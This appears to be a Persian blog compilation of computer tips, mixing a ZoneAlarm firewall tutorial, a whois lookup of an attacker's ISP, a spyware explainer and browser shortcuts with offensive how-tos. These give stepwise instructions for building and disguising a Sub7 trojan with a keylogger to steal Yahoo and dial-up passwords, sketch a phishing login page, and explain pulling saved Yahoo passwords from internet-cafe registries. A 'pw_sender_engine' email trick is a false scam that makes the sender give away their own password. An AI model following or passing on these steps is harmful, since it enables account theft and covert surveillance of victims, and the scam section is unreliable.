اگر zonealarm را نصب كرده باشيد (zone alarm یک برنامه قوی ضد هک است که نحوه استفاده از آنرا توضیح خواهم داد)، حتما متوجه شده ايد كه بعد از هر attack كه از طرف هكر به كامپيوتر شما انجام مي شود ، اين برنامه IP Address شخص حمله كننده را در اختيار شما قرار مي دهد. در اين هفته قصد دارم نحوه شناسايي ISP ي كه از طريق آن هكر به اينترنت متصل است را شرح دهم.

پس از اينكه IP هكر را از طريق برنامه zonealarm و يا هر برنامه ديگري بدست آورديد به آدرس زير برويد كه يك Who is ساده است.

http://www.ripe.net/perl/whois

در بالاي صفحه box خالي اي وجود دارد و در كنار آن دكمه submit query وجود دارد. IP را در box نوشته و بر روي دكمه كليك كنيد.

نتيجه اي كه پس از چند ثانيه خواهيد ديد ، چيري شبيه به اين است :

% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 213.217.40.0 - 213.217.43.255
netname: parsonline
descr: parsonline corp.
descr: Internet Service Provide
country: IR
admin-c: AF1351
tech-c: HOP1972
tech-c: SHP76-RIPE
status: ASSIGNED PA
notify: shirinp@parsonline.net
mnt-by: RIPE-NCC-NONE-MNT
changed: hooman@parsonline.net 20010818
source: RIPE

route: 213.217.40.0/22
descr: ParsOnline Co.
descr: Announced by SMS for ParsOnline Co.
origin: AS13126
notify: networks@sms-internet.net
notify: afateh@parsonline.net
mnt-by: AS13126-MNT
changed: darren.frowen@sms-internet.net 20020409
source: RIPE

person: Abdollah Fateh
address: Pars o­nline Co.
address: 224 Khoramshahr ave., No. 6C
address: Tehran 15337
address: Iran
phone: +98 21 875 7277
fax-no: +98 21 874 9595
e-mail: afateh@parsonline.net
nic-hdl: AF1351
changed: afateh@parsonline.net 20000628
changed: afateh@parsonline.net 20020130
source: RIPE

person: Hooman Parta
address: Pars o­nline Co.
address: 224 Khoramshahr Ave., #6C
address: Tehran 15337
address: Iran
phone: +98 21 875 7277
fax-no: +98 21 874 9595
e-mail: hooman@parsonline.net
nic-hdl: HOP1972
changed: hooman@parsonline.net 20000629
source: RIPE

person: Shirin Pourkashani
address: Pars o­nline Co.
address: 224 Khoramshahr Ave., #6C
address: Tehran 15337
address: Iran
phone: +98 21 875 7277
fax-no: +98 21 874 9595
e-mail: shirinp@parsonline.net
nic-hdl: SHP76-RIPE
changed: shirinp@parsonline.net 20010410
source: RIPE

در اين نتيجه شما مي توانيد به راحتي نام ISP و Email شخصي كه اين IP Range در اختيار اوست را مشاهده نماييد.
اگر با جوابي مانند EU-ZZ-XXXX برخورد نموديد ، به آدرسهاي زير برويد و آنجا سعي در يافتن ISP هكر خود نماييد.

http://www.arin.net/whois/index.html

http://www.apnic.net/apnic-bin/whois2.pl

از اينجا به بعد شما كاري نمي توانيد انجام دهيد. فقط مي توانيد با ISP يا آدرس Email ي كه مشاهده مي كنيد ، تماس بگيريد و تاريخ و زمان و IP هكر را بدهيد و از آنها درخواست نماييد با اين كاربر خطاكار برخورد نمايند. ولي متاسفانه از آنجايي كه هيچ قانون مدوني در مورد جرايم الكترونيكي وجود ندارد ، و نيز معمولا ISP ها به علت داشتن تعداد كاربران زياد اطلاعات كاملي از IP هايي كه در زمانهاي مشخص در اختيار كاربران گذاشته اند ندارند ، عملا كاري از شما بر نمي آيد.

در نظر داشته باشيد كه گاهي مواقع ZoneAlarm دستورهاي Ping و يا Routing را نيز به عنوان Attack معرفي مي كند. يا حتي احتمال دارد به صورت اتفاقي يك كاربر IP Sniffing انجام دهد بدون قصد هك كردن ولي ZoneAlarm همه را به عنوان Attack معرفي مي نمايد. پس پيشنهاد مي كنم اگر از يك IP بارها به شما Attack شد ، آنوقت سعي در يافتن هكر نماييد.

آموزش نرم افزار zone alarm 5.5 :

لطفا قبل از استفاده به نکات زير توجه کنيد:

1. اين آموزش مربوط به ورژن 5 و 5.5 نرم افزار Zone Alarm هست. پس از نصب نرم افزار و دادن اطلاعاتي که مورد نياز است برنامه را اجرا مي کنيم :
اگر از صفحه خود آموز آن (Tutorial) صرفنظر کنيم صفحه اي جلوي شما باز مي شود که داراي 8 برگه مي باشد .در صفحه اصلي اين نرم افزار بخش هايي ديده مي شوند.
در قسمت بالايي بخشهايي شامل دکمه STOP و فيلد هاي IN و OUT ديده مي شوند.
دکمه STOP براي زماني است که شما بلافاصله مي خواهيد تمام پورت هاي ورودي و خروجي سيستم خود را ببنديد.
با فشردن اين دکمه تمام برنامه هاي مرتبط با اينترنت و رد و بدل اطلاعات بسته مي شوند (قفل سمت راست صفحه که مربوط به برنامه هاست نيز بسته مي شوند) . فيلد هاي IN و OUT مربوط به نمايش ورودي و خروجي اطلاعات از رايانه مي باشند.
شماي کوچکي از اين دو فيلد هنگام اتصال به اينترنت در نوار ابزار ويندوز ظاهر مي شود .در سمت راست بالاي صفحه قفل PROGRAMS وجود دارد . با فشردن اين قفل برنامه هاي مرتبط با اينترنت قطع مي شوند ولي ارتباط اصلي با اينترنت قطع نمي شود.
ليست اين برنامه ها در برگه کنترل برنامه قابل تغييرند.
Overview ( نگاه گذرا ) :
در اين برگه يک شماي کلي از کارايي نرم افزار را خواهيم ديد اين برگه داراي 3 منو مي باشد :
Status (وضعيت)- Product info (اطلاعات نرم افزار) Preferences (تنظيمات اضافي) ?منوي Status :
در اين منو در سمت راست پنجره سه پنجره مي بينيد . پنجره اول مربوط به بازکردن خود آموز نرم افزار مي باشد.
پنجره دوم مربوط به بروز رساني نرم افزار است و دو پنجره بعدي نيز شما را به سايت نرم افزار هدايت مي کند.
در قسمت بالايي اين صفحه زير عنوان Blocked intrusions تعداد حملات بلوکه شده توسط نرم افزار نشان داده مي شوند و خط پايين تعداد حملاتي را نشان مي دهد که به دفعات مي خواستند حمله کنند.
در قسمت Inbound protection تعداد برنامه هايي را نشان ميدهد که هکر ها مي خواستند با استفاده از آن در رايانه نفوذ کنند و قسمت Outbound protection نيز تعداد برنامه هايي را نشان مي دهد که مي خواستند اطلاعات سيستم را به هکر منتقل کنند.
قسمت Email protection فعاليت سيستم حفاظت ايميل و تعداد ضميمه هايي را که به دليل آلوده بودن قرنطينه شدند را نشان مي دهد ?منوي Product info :
اين منو شامل چهار قسمت مي باشد . قسمت اول شامل اطلاعات ورژن نرم افزار و قسمت دوم مربوط به مجوز استفاده نرم افزار مي باشد ( آزمايشي بودن نرم افزار و يا نرم افزار Register شده ) و قسمت سوم مربوط به پشتيباني و اطلاعات بروز رساني نرم افزار است و بالاخره قسمت چهارم مربوط به اطلاعات ثبت نرم افزار است که شامل نام استفاده کننده از نرم افزار و کد ثبت نام است که با فشردن کليد Change reg مي توان آن را تغيير دد.
منوي Preferences :
قسمت اول مربوط به تنظيم رمز عبور براي نرم افزار است که کاربران ديگر را از دسترسي به نرم افزار منع مي کند.
قسمت دوم مربوط به گرفتن نسخه پشتيبان از تنظيمات فعلي نرم افزار است. قسمت سوم مربوط به چک کردن بروز رساني نرم افزار است که بين دو حالت خودکار و دستي قابل تنظيم است. قسمت چهارم شامل چهار تنظيم است که آخرين مورد تنظيم رنگ زمينه نرم افزار است و قسمت پنجم که مربوط به تماس با شرکت سازنده نرم افزار است . توجه :
قسمت رمز گذاري و تهيه نسخه پشتيبان از تنظيمات و هم چنين قسمت تغيير رنگ برنامه در نسخه آزمايشي فعال نمي باشد و براي فعال کردن آنها دادن شماره سريال برنامه در قسمت مربوطه لازم است . Firewall ( ديوار محافظ ) :
اين قسمت شامل سه سر برگ مي باشد که اصلي ترين آنها را توضيح مي دهيم :
سر برگ Main :
که در اين پنجره با استفاده از دو قسمت بالايي و پاييني مي توان امنيت را تنظيم کرد با اين تفاوت که قسمت بالايي براي تنظيم ديواره آتش و قسمت دوم براي تنظيم امنيت زماني که رايانه در يک شبکه امن قرار دارد استفاده مي شود . در سطح امنيتي High رايانه شما از ديد مخفي است و حفاظت شده و به اشتراک گذاشتن رايانه ها نيز مجاز نمي باشد.
در سطح امنيتي Medium رايانه شما قابل مشاهده و حفاظت شده است رايانه هاي ديگر مي توانند شما را ببينند ولي به اشتراک گذاري رايانه ها مجاز نيست. در سطح امنيتي Low ديواره حفاظتي خاموش است . در پايين اين صفحه دکمه Advance وجود دارد که بوسيله آن مي توان تنظيمات بيشتري را اعمال نمود.
البته در سر برگ Zone نيز مي توان آدرس رايانه هايي را بعنوان رايانه هاي امن به نرم افزار دد.
Program control ( کنترل برنامه ها ) :
اين منو شامل سه سر برگ است :
سر برگ Main :
در اين سر برگ بخش اول شامل کنترل برنامه هاست داراي چهار سطح است :
سطح Off که کنترل برنامه خاموش است . سطح Low به حالت آموزشي قرار دارد.
در سطح Medium در مورد اجراي برنامه ها در زمان استفاده از اينترنت از شما سوال مي کند.
سطح High از اجراي برنامه ها در زمان استفاده از اينترنت در بالاترين سطح محافظت مي کند.
بخش دوم اين سر برگ مربوط به تنظيمات نمايش هشدارها است و بخش سوم نيز مربوط به قفل خودکار است که از طريق دکمه Custom مي توان زمان قفل شدن برنامه ها و چگونگي آن را تنظيم کرد .از سر برگ Program نيز مي توان براي اضافه نمودن برنامه هايي که در بخش قبل توضيح داده شد استفاده کرد.
Antivirus monitoring :
در اين قسمت وضعيت برنامه ضد ويروس شما و فعال يا غير فعال بودن آن و همچنين بروز بودن آن قابل مشاهده است. E –mail protection :
اين بخش نيز شامل دو قسمت است که در قسمت اول مربوط به ضميمه ايميل هاست و قسمت دوم مربوط به خود ايميل ها در سر برگ Attachment مي توان نوع فايل هايي را که قابل بلوکه شدن هستند را تعيين نمود . Privacy :
سر برگ Main :
قسمت اول براي کنترل فايلهاي cookie براي سايتهاي مختلف و قسمت دوم جهت کنترل پنجره ها پنجره هاي تبليغاتي مورد استفاده قرار مي گيرد سر برگ دوم جهت اضافه کردن سايتها براي استفاده فايلهاي cookieبکار مي رود سر برگ Cache cleaner :
قسمت اول براي پاک کردن فايلهايي است که از طريق کليد custom به آنها خواهيم پرداخت. در قسمت دوم مي توان برنامه را براي انجام پاکسازي زمان بندي کرد و در قسمت سوم مي توان cookie هايي را يافت که قصد رديابي اعمال ما در اينترنت را دارند.
ID lock :
اين قسمت جهت حفاظت از اطلاعات شخصي بکار مي رود که اين اطلاعات را مي توان از سر برگ myVault تنظيم کرد Alert & logs ( اعلان و ثبت عمليات ) :
سر برگ Main :
در قسمت اول اين سر برگ مي توان قابليت نمايش اعلان ها را فعال يا غيرفعال کرد.
در قسمت دوم نيز مي توان واقعه نگاري را فعال و يا غير فعال کرد.
سر برگ Log viewer:
در اين سر برگ اطلاعات فايل log به صورت دسته بندي شده قابل دسترسي است.

Trojan:
اين روش بهتريه و درصد براي به دست آوردن پسورد خيلي بالاست و شما براي به دست آوردن هر نوع پسوردي ميتونين از اون استفاده كنين(چه پسورد اينترنت و چه پسورد ياهو و Msn و ...)
۱- وارد سايت http://www.sub7.net/ بشين
۲-Enter كنين
۳ـ وارد قسمت Downloads بشين
۴ـ روي Old Version Downloads كليك كنيد
۵ـSub7 2.2 رو download كنين
۶ـ پس از download و Setup كردن به فولدري كه برنامرو Setup كردين برين و فايل:EditServer.exe رو اجرا كنين
۷ـ پس از اجرا كردن يه پنجره باز ميشه و شما Run In Normal Mode(اجرا در محيط نرمال) رو انتخاب كنين
۸- به Port كاري نداشته باشين و در صورت مايل بودن براي سرور خود پسورد انتخاب كنين
۹- در منوي سمت چپ به startup methods كاري نداشته باشين و بر روي Notification كليك كنيد
۱۰-روي add e-mail notify كليك كنيد و آدرس اي ميل خودتون رو وارد كنين(@ يادتون نره)
۱۱-حالا دوباره از منوي سمت چپ PlugIns رو انتخاب كنين
۱۲ـ رو add binded Plugin كليك كنين
۱۳ـ از فولدر PlugIns پلاگ اين s7keys.dll رو انتخاب كنين
۱۴-روي exe icon/other كليك كنين
۱۵-در اين قسمت ميتونين براي سرور خودتون آيكون و Error گمراه كننده درست كنين
۱۶-روي ...Save as كليك كنين و سرور خودتون رو Save كنين

نكته :
۱-توجه داشته باشين كه براي Save كردن بايستي exe. رو بنويسين
۲-هرگز فايل server.exe رو اجرا نكنين همينطور سرورهايي كه خودتون ساخته ايد
۳-بهتر است براي آن كه كسي به exe بودن سرور شما شك نكنه از پسوند scr. به جاي exe. استفاده كنين(موقع Save كردن)
۴ـبهتر است هميشه E-mail ياهوي خودتونو بدين و Msn و Hotmail اكثرا كار نميكنند.

Hack:
۱-پس از ساختن سرور كافيست اونو براي كسي كه مايل به Hack كردنش هستين بفرستين پس از اين كه طرف فايل رو اجرا كرد به آدرس E-Mail كه دادين يه ميل مياد كه Subject:Online و پس از باز كردن در اون يه شماره IP وجود داره اونو كپي كرده و سپس برنامه Sub7.exe رو اجرا كرده و در قسمت IP وارد كنين(Port هم همچنين) و بر روي Connect كليك كنين
۲-پس از وصل شدن به كامپيوتر طرف از منوي سمت چپKeys/messeges رو انتخاب كنين
۳-سپس KeyBoard رو انتخاب كنين
۴-بعد Open KeyLogger رو باز كنين و بر روي آيكون ¤دست¤ كليك كنين

حالا تمام كليدهاي كه طرف شما وارد ميكنه قابل ديدن هستن كافيه يه بار اونو از باهو بندازين بيرون و منتظر بمانين كه دوباره LogIn كنه و پسوردشو وارد كنه
در صورتي كه اين كار جواب نداد ميتونين از قسمت Yahoo!Spy استفاده كنين

نكته:
براي بدست آوردن اينترنت بر روي Advanced/Passwords/Ras Passwords كليك كنين و پس از Upload شدن پلاگ اين مربوطه ميتونين پسوردهاي طرفو در ببارين
در صورتي كه Windows طرف XP باشه متاسفم چون امكان در آوردن پسورد وجود نداره

********************************
 – از طریق رفتن پروفایل ! خوب قبل از این که یاهو سیستم امنیتیش رو عوض کنه پروفایل و ایمیل روی یه سرور کدبندی شده بودند و شما می تونستید با نگاه کردن به کد بندی و آدرس پروفایل و یکمی زیرکی بدون دونستن پسورد ایمیل وارد یاکس ایمیلش بشید که این روش بعد از تغیر سیستم امنیتی یاهو خیلی خیلی سخت شده و شاید هم ناممکن !

********************************
4- شبیه سازی صفحه ورود به ایمیل است که درواقع پشت اون یه پسورد سندر همه کارارو انجام می ده ! و به این شکل هست که ابتدا یه صفحه لاگین ایمیل مانند یاهو می سازید و در سایت خودتون قرار میدی و فرد با وارد شدن به این قسمت و دادن پسورد خود در واقع اونو به ایمیل شما می فرسته !

بدست آوردن پسورد ايميل افراد :

ابتدا وارد قسمت compose ايميل شويد:
?- در قسمت to اين عبارت را وارد کنيد : pw_sender_engine@yahoo.com
? - در قسمت subject وارد کنيد : find IP ( البته در اين قسمت هر عبارتي وارد کنيد فرقي نمي کند)
? - حال متن ايميل را به صورت زير بنويسيد :
ابتدا در خط اول آدرس ايميل شخصي که مي خواهيد هک کنيد را بنويسيد .
در خط دوم عبارت زير را بدون اشتباه تايپ کنيد ( براي اطمينان از همينجا مي شود کپي پيست کرد)
(from 66.218.69.8 (Hmailer8.bulk.scd.yahoo.com
در خط سوم پسورود ايميل خود را بنويسيد
در خط چهارم عبارت زير:
 

              by n25.grp.scd.yahoo.com with NNFMP 66.218.66.120

در خط پنجم به تعداد ۸ ستاره ( تعداد رقم های Ip Adress ) تايپ کنيد به اين صورت :

********
کار تمام است ... حال دکمه send را بزنيد .
پس از حداکثر ۳ ساعت شما ايميلي دريافت خواهيد کرد که حاوي پسوورد قرباني خواهد بود .
نکات :
در اين روش شخص قرباني به هيچ وجه از اينکه توسط شما هک شده است مطلع نخواهد شد .
در صورتي که پسوورد شخص قرباني بيشتر از ۱۰ رقم باشد اين پسوورد در دو ايميل جداگانه براي شما فرستاده خواهد شد به اين صورت که در يک ايميل ۶ رقم اول و در ايميل دوم رقمهاي بعدي.
جالب است که ياهو بسيار تلاش مي کند تا جلوي يافتن پسوورد ديگران را بگيرد ولي باز هم راههاي زيادي وجود دارد که خود ياهو پسوورد افراد را به شخص هکر تقديم مي کند.

نحوه بدست آوردن IP افراد در Yahoo Messenger بدون ابزار :

هنگامي كه شما در Chat با كسي در حال رد وبدل كردن اطلاعات هستيد در ابتدا جهت اين برقراري سيستم عامل يك سوكت براي شما باز مي كند. به مجموعه يك آدرس IP و يك Port سوكت مي گويند كه بصورت زير نمايش داده مي شود. IP Address:Port Number 192.168.1.1:80 Localhost:5050
قبل از ادامه ابتدا در مورد Port توضيح مختصري بدهيم:Port يك شماره است كه به برنامه هايي كه در خواست Connect به اينترنت را دارند داده مي شود يك نسبت است ولي اينجا ما با يك مثال نا درست سعي مي كنيم مفهوم Port را بيشتر جا بياندازيم فرض كنيد يك قلعه بزرگ با درهاي بسيار زياد جهت ورود و خروج افراد داريد در اين قلعه هر در داراي يك شماره است و هر در مربوط به ورود و خروجي افراد اجتماع با طبقات اجتماعي مختل است افراد فقير از درب ?? ،متوسط از درب ? ،پولدار از درب ? و ... كه بصورت فقير:??،متوسط:? ، پولدار :? نشان داده مي شوند.يا مانند دونده هاي دو ميداني كه بر پشت پيراهن آنها يك شماره جهت مشخص شدن وجود دارد.

در Chat نيز به همين صورت است كه شما پش از اتصال به ارتباط ميان شما و دوست ديگر تان يك سوكت اطلاق مي شود و اين سوكت?IP:Port? شما مي توانيد به سادگي از طريق فرمان Netstat بيرون بكشيد.

جهت اين كار ابتدا شما بايد فقط در Chat ميان خود و يك نفر ارتباط وجود داشته باشد با تمرين زياد و كسب مهارت ديگر نياز به اين كار نخواهيد داشت  و بعد از آن از منوي Start گزينه Run را كليك كرده و در آن عبارت Command را مي نويسيد و سپس اينتر مي كنيد حال در پنجره با شده فرمان زير را بنويسيد:

C:\>Netstat 3

Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1027 0.0.0.0:0 LISTENING

سپس اينتر مي زنيم توجه كنيد كه پس از اينتر زدن تمامي سوكتهاي باز شده ميان برنامه هاي سيستم شما و اينترنت نمايش داده مي شود در جلوي تمامي ارتباطاتي كه برقرار است كلمه Established وجود دارد و تمامي برنامه هايي كه منتظر ارتباطي هستند?Danger?كلمه LISTENING وجود دارد.شما در اين ليست بدنبال كلمه Yahoo باشيد و به Port آن توجه كنيد كه ???? در جلوي آن درج شده بعد از اين سوكت سوكت بعدي آدرس شمادر قسمت Local Addressو آدرس دوست شما در قسمت Foreign Address و در قسمت State حالت اتصال را Established معرفي كرده كه به معناي براقراري اتصال است. و در قسمت Proto نوع پروتكلي را كه اطلاعات با آن ردوبدل مي شود نمايش داده مي شود.

Active Connections

Proto Local Address Foreign Address State
TCP XXXX:1037 cs20.msg.dcn.yahoo.com:5050 ESTABLISHED
TCP XXXX:1073 toolbar.google.com:80 ESTABLISHED
TCP XXXX:1097 216.239.59.99:80 ESTABLISHED
TCP XXXX:1099 66.102.7.104:80 ESTABLISHED
TCP XXXX:1102 home.earthlink.net:80 ESTABLISHED
TCP XXXX:1106 home.earthlink.net:80 ESTABLISHED
TCP XXXX:1112 63.240.15.144:80 ESTABLISHED

در قسمت خط چين تمامي مشخصات دوست شما وجود دارد.

در آوردن پسورد ياهو از رجیستري :

از منوي Start گزينه Run را انتخاب كنيد و Regedit را تايپ كنيد تا داخل محيط ويرايش رجیستري
شويد حالا به اين كليك در رجیستري برويد :

HKEY_CURRENT_USER\Software\Yahoo\Pager
و روي Save Password دو بار كليد كنيد و عدد 100 را در آن تايپ كنيد و OK بزنيد حالا
ياهو مسنجر را نگاه كنيد آخرين ID و Password ID مي بينيد مي توانيد باآن LOGIN
بشويد .
حال بايد يك برنامه كه از قبل آمده كرده باشيد كه پسورد روي ويندوز را بخواند كه با
آن بتوانيد پسورد درون ياهو مسنجر را بخوانيد.
اين كار شما مي توانيد در كافي نت انجام بدهيد چون پسورد شخص قبلي كسي
كه قبل از شما كار مي كرده اگر هم پسورد هم Save نكرده باشه مي توانيد در
بياريد .
توجه : شما مي خواهيد اين كارو در كافي نت انجام بدهيد اما مي بينيد هر چي
Regedi را در Run تايپ مي كنيد ويندوز Error به شما مي دهد اين به آن معنا است
كه رجستري ويندوز پسورد داره پس شما بيايد به جاي Regedi اين را regedt32 تايپ
كنيد ...

Spyware ها چگونه کار می کنند؟!!

  باز کردن یک ای میل مشکوک, دانلود یک برنامه رایگان ,رفتن به سایت ها آدرسها و لینک های ناجور و نامشخص و فریبنده, برنامه های اشتراک فایل و شاید گوش دادن به یک فایل مولتی مدیا به صورت آنلاین, کافیست تا یک برنامه Spyware/Adware بر روی سیستم شما نصب شود.این برنامه ها برای نصب هرگز اجازه نمی گیرند و شما از نصب آنها هرگز مطلع نخواهید شد.اجرای برنامه هایی از این دست همیشه در پس زمینه خواهد بود و با دست کاری تنظیمات اتصال به اینترنت و مرور گر سیستم  و نشاندن فایل ها و کلید هایی در رجیستری سیستم عامل اهداف خود را پیگیری می کنند.در هر اتصال به اینترنت با رد گیری وب گردی و کار های روزانه کاربر در اینترنت به جمع آوری اطلاعات می پردازند و این اطلاعات را انتقال میدهند.

یک Spyware برای شما چه خطراتی می تواند داشته باشد؟ 

- ربودن اسم کاربری و پسورد سیستم و یا هر کلید احراز هویت در سایت ها و برنامه ها.

- ربودن محتویات ایمیل و چت و تالار های گفتگو.

- ربودن اطلاعات مهم و حیاتی سیستم.

- جاسوسی سایتها و نشانه های اینترنتی , صفحه نمایش, برنامه ها و Favorites سیستم

- مورد هجوم قرار دادن سیستم با انواع صفحات تبلیغاتی و Pop up .

- استفاده از مرور گر و اتصال  اینترنت شما برای اهداف خود مانند فرستادن ایمیل اسپم

- سیستم شما را آنطور که دوست دارند آرایش دهند.مثلا در هر اتصال یک سایت بازدید شود.

 - نشاندن ویروس Backdoor, Trojan یا اعمال خرابکارانه بر روی سیستم قربانی.

- کاهش سرعت و بازدهی سیستم مخصوصا در اتصال به اینترنت.

بيشتر بدانید!

یک برنامه جاسوسی Spyware این قدرت را دارد که به تنهایی در حدود 300 فایل را نصب کند و در حدود 500 ورودی به ریجستری اضافه کند!

تا کنون بیش از 80 هزار نرم افزار جاسوسی کشف شده است!

در یک تحقیق از شرکت آمریکا آنلاین و اتحادیه ملی امنیت سایبر بیش از 80% کامپیوترها حداقل دارای یک Spyware هستند و از هر 10 کامپیوتر 9 کامپیوتر آلوده به این برنامه های جاسوسی است.

کار شرکت های سازنده نرم افزار های جاسوسی کاملا قانونی است و حتی از شما موقع نصب اجازه می گیرند اما زیرکانه!

نرم افزار های اشتراک فایل مانند Kaza و سیستم های P2P بیشترین عامل توزیع  Spywareها هستند!

---

دلايل پاک شدن آفلاين‌ها در ياهو مسنجر :

يکي از مهمترين دغدغه هايي که کاربران ياهو مسنجر با آن مواجه هستند از بين رفتن آفلاين هايي است که دوستان براي آنها ارسال ميکنند. به اصطلاح گاهي آفلاين‌هاي ياهو مسنجر مي‌پرد. اين موضوع دلايل مختلفي دارد. در اين ترفند قصد داريم به بررسي دلايل مختلف اين پيش آمد بپردازيم و راه حل ساده مشاهده مجدد آفلاين‌ها را به شما معرفي کنيم.

اما دلايلي که باعث مي‌شوند آفلاين‌هاي ما از بين بروند:

پائين بودن سرعت وصل شدن به سرور ياهو

از آنجايي که بيشتر کاربران اينترنتي در ايران از سرويس اينترنتي تلفني يا DIALUP استفاده مي کنند، از سرعت پائيني برخوردارند. و هنگام وصل شدن به سرور ياهو مسنجر، به دليل اين که ارسال بسته هاي اينترنتي (PACKETS) به سرور ياهو بيش از حد معمول طول مي کشد، لذا تصور ياهو بر اين مي شود که شما قطع شده ايد و بايد دوباره وصل شويد. در حالي که نصف عمليات LOGIN شدن را انجام داده ايد. در اين حالت، به دليل اين که يک ارتباط (ولو ناموفق) با ياهو برقرار شده است، ياهو با احتساب اين که شما به سرور وصل شده ايد، آفلاين ها را براي شما ارسال مي کند. و از محل نگهداري آن پاک مي شود. و چون شما در برقراري تماس با ياهو ناموفق بوده ايد، لذا دوباره وصل مي شويد. که اين عمل باعث مي شود آفلاين هاي شما از بين برود. زيرا طبق تصور ياهو، ديگر آفلايني وجود ندارد که براي شما ارسال شود. البته در نسخه هاي 5 و به قبل ياهو مسنجر، هيچ وقت آفلاين‌ها پاک نمي شدند و خود شما بايد آنها را پاک مي کرديد.

بد شانسي در ارتباط اينترنت

چنانچه وقتي مسنجر شما در حال بالا آمدن باشد و به طور تصادفي اينترنت شما قطع (DISCONNECT) شود، متاسفانه پنجره آفلاين هاي شما خود به خود بسته مي شود. البته چنانچه از پشت LAN به ياهو وصل شده باشيد، کمي طول مي کشد تا قطع بودن شما به برنامه ياهو مسنجر ثابت شود.

زياد بودن بيش از حد آفلاين ها

کساني که افراد زيادي آنها را ADD کرده اند و مرتبا SEND TO ALL از افراد مختلف دريافت مي‌کنند، معمولا در دريافت آفلاين ها مشکل دارند. چون ياهو از يک حدي بيشتر آفلاين ها را نگهداري نمي کند و چنانچه به بيش از حد مورد نظر برسد، تنها تعداد خاصي از آخرين آفلاين ها به نمايش در مي آيند و بقيه دور ريخته مي شوند.

دير به دير LOGIN کردن به ياهو مسنجر

چنانچه شما يک مدت طولاني از ياهو مسنجر استفاده نکنيد آفلاين هاي شما مي‌پرد.

مشاهده مجدد آفلاين‌ها

اما چه کنيم که آفلاين‌هاي خودمان را مجدد مشاهده کنيم؟ بدين منظور بايد قسمت MESSAGE ARCHIVE ياهو مسنجر را فعال کنيم.

بدين منظور از منوي MESSENGER به PREFERENCES برويد. حالا به قسمت ARCHIVE رفته و تيک گزينه YES SAVE ALL OF MY MESSAGES را بزنيد. اکنون OK کرده و خارج شويد.

پس از اين کار تمامي آفلاين‌هايي که براي شما ارسال مي‌گردد و در داخل MESSAGE ARCHIVE ذخيره مي‌شود. براي مشاهده اين قسمت از منوي CONTACTS به MESSAGE ARCHIVE برويد.

دقت کنيد آفلاين‌هايي که برايتان ارسال ميشود ولي هرگز به دست شما نمي‌رسند طبعأ در اين قسمت هم ذخيره نمي‌شوند.

---

معرفي کليد هاي ميانبر اينترنت اکسپلورر :

فهرست تمامي SHORTCUT ها در مرورگر

IE

F1: نمايش راهنماي مرورگر. در زماني که پنجره اي باز باشد راهنماي مربوط به همان عنصر را نمايش ميدهد.

F11 : جابجايي بين حالت تمام صفحه در مرورگر و پنجره در ابعاد عادي

TAB : حرکت بسمت جلو در بين عناصر صفحه وب و نوار آدرس و نوار لينک.

SHIFT+TAB : حرکت بسمت عقب در بين عناصر صفحه وب و نوار آدرس و نوار لينک.

ALT+HOME : رفتن به صفحه خانگي

ALT+RIGHT ARROW : رفتن به صفحه بعدي

ALT+LEFT ARROW : رفتن به صفحه قبلي

BACKSPACE : رفتن به صفحه قبلي

SHIFT+F10 : نمايش منوي آبشاري و ميان بر براي يک لينک

CTRL+TAB : انتقال بين فريم ها بسمت جلو

F6 : انتقال بين فريم ها بسمت جلو

SHIFT+CTRL+TAB : انتقال بين فريم ها بسمت عقب

UP ARROW : حرکت صفحه بسمت ابتداي سند

DOWN ARROW : حرکت صفحه بسمت انتهاي سند

PAGE UP : حرکت به سمت ابتداي صفحه با انجام پرشي بزرگ تر ( نسبت به UP ARROW)

PAGE DOWN : حرکت به سمت انتهاي صفحه با انجام پرشي بزرگ تر ( نسبت به DOWN ARROW)

HOME : انتقال صفحه به ابتداي سند

END : انتقال صفحه به انتهاي سند

CTRL+F : نمايش پنجره جستجو براي صفحه جاري

F5 : تازه سازي (REFRESH) نمودن صفحه در صورتي که نيازي به اين کار باشد( تاريخ صفحه که بصورت محلي بروي سيستم شما ذخيره شده است با تاريخ صفحه در وب متفاوت باشد)

CTRL+R : تازه سازي (REFRESH) نمودن صفحه در صورتي که نيازي به اين کار باشد( تاريخ صفحه که بصورت محلي بروي سيستم شما ذخيره شده است با تاريخ صفحه در وب متفاوت باشد)

CTRL+F5 : تازه سازي (REFRESH) نمودن صفحه ( تاريخ صفحه که بصورت محلي بروي سيستم شما ذخيره شده است با تاريخ صفحه در وب يکسان باشد) مناسب براي صفحاتي که توسط ISPها CACHE مي شوند.

ESC : متوقف نمودن عمليات دانلود در صفحه

CTRL+O : باز نمودن يک مکان (آدرس اينترنتي) ديگر

CTRL+L : باز نمودن يک مکان (آدرس اينترنتي) ديگر

CTRL+N : باز نمودن يک صفحه مرورگر ديگر

CTRL+W : بستن صفحه مرورگر جاري

CTRL+S : ذخيره نمودن صفحه جاري

CTRL+P : چاپ صفحه جاري

ENTER : فعال سازي لينک انتخاب شده

CTRL+E : باز نمودن جستجو در نوار مرورگر

CTRL+I : باز نمودن علايق(FAVORITES) در نوار مرورگر

CTRL+H : باز نمودن سابقه (HISTORY) در نوار مرورگر

ALT+D : قرار دادن متن انتخاب شده در نوار آدرس

F4 : نمايش نوار آدرس سوابق

CTRL+LEFT ARROW : در صورتي که اين کليد را در نوار آدرس فشار دهيد مکان نما به شکست بعدي سمت چپ ( محلي که کاراکتر / قرار دارد ) منتقل مي گردد.

CTRL+RIGHT ARROW : در صورتي که اين کليد را در نوار آدرس فشار دهيد مکان نما به شکست بعدي سمت راست ( محلي که کاراکتر / قرار دارد ) منتقل مي گردد.

CTRL+ENTER : در نوار آدرس با زدن اين کليد رشته HTTP://WWW. به اول متني که در آدرس باز نوشته ايد اضافه مي گردد. همچنين رشته .COM را به انتهاي اين رشته اضافه مينمايد. مثال : GOOGLE HTTP://WWW.GOOGLE.COM

UP ARROW : در صورتي که خاصيت AUTO COMPLETE فعال باشد. در ليست مزبور به سمت بالا حرکت مي کند.

DOWN ARROW : در صورتي که خاصيت AUTO COMPLETE فعال باشد. در ليست مزبور به سمت پايين حرکت مي کند.

CTRL+D : صفحه جاري را به فهرست علايق (FAVORITES) اضافه ميکند.

CTRL+B : نمايش پنجره سازمان دهي علايق (FAVORITES)

ALT+UP ARROW : بالا رفتن در لسيت در پنجره سازمان دهي علايق (FAVORITES)

